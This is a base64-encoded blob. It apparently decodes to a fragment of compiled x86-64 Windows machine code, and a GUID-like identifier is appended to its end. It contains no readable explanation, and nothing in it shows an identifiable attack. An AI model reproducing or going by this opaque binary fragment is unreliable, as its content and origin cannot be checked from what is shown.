SD4T/AAAASY0MMEkr+HQxSY2A//7/f0gDx0iNFcTZCwBIK9FIhcB0GESKBApFhMB0D0SIAUj/yEj/wUiD7wF140iF/0iNQf9ID0XBxgAAD4SxAAAASIlsJGBIjQWQ/P//TIl0JFhIjbssAwAASIlEJFBMjQ3c+v//SI0FPfz//0iLz0iJRCRITI0Ftvr//0iNBe/7//9IiUQkQEiNFZ/6//9IjQWo+///SIlEJDhIjQVk+///SIlEJDBIjQUg+///SIlEJChIjQWQ+v//SIlEJCD/Fe2gCgBIiQNIhcB1JosP6Or9//+LF0iNDf3YCwBMi8Do2XkAAOsMSI0NfNkLAOjLeQAASIM7AHUMSIvL/xVApgoASIvYTI1cJHBIi8NJi1sQSYtrGEmLcyBJi3soSYvjQV7DzMzMSIlcJAhIiXQkEEiJfCQYQVZIg+xASIv6TIvxSIvPulwAAADoMIIIAEiL2EiFwHQFSP/D6wNIi99Jiw64AxUAAGaJRCQ4RTPJSI0Fgfz//0yLw0iJRCQwSIvXSI0Fp/n//0iJRCQoSI0FL/z//0iJRCQg/xUkoAoAi/CFwHUlQYuWLAMAAIvK6Az9//9Mi8BIiVwkIEiNDVnZCwBMi8/o9XgAAEiLXCRQi8ZIi3QkWEiLfCRgSIPEQEFew8xIi8RIiVgISIloEEiJcBhIiXggQVRBVkFXSIPsILqAAAAASIv5jUrA/xVqpQoASIvYSIXAD4TsAAAADxAHSI1PNEiNUQQPEQAPEE8QDxFIEA8QRyAPEUAgi0cwiUMwSIlLNESLyEkD0UGLBAmJQ1RMjUIETAPASIlTWIsMEEyJQ0yLwUmNUASJS0hIA9BCiwwBiUs8SIlTQEyNQQSLDBFMA8KJS2CLwUyJQ2RCiwwBTY1QBESLQyRMA9CJS2xMiVNwRYXAdBiLwUiNU3iD4QFIA8hJA8rozgIAAESLSzBBi9FIjUs06GrhAACLUzxIjUtA6F7hAACLU0hIjUtM6FLhAACLU1RIjUtY6EbhAACLU2BIjUtk6DrhAACLU2xIjUtw6C7hAABIi2wkSEiLw0iLXCRASIt0JFBIi3wkWEiDxCBBX0Feca01fcea-474b-436a-adb2-5525b572a163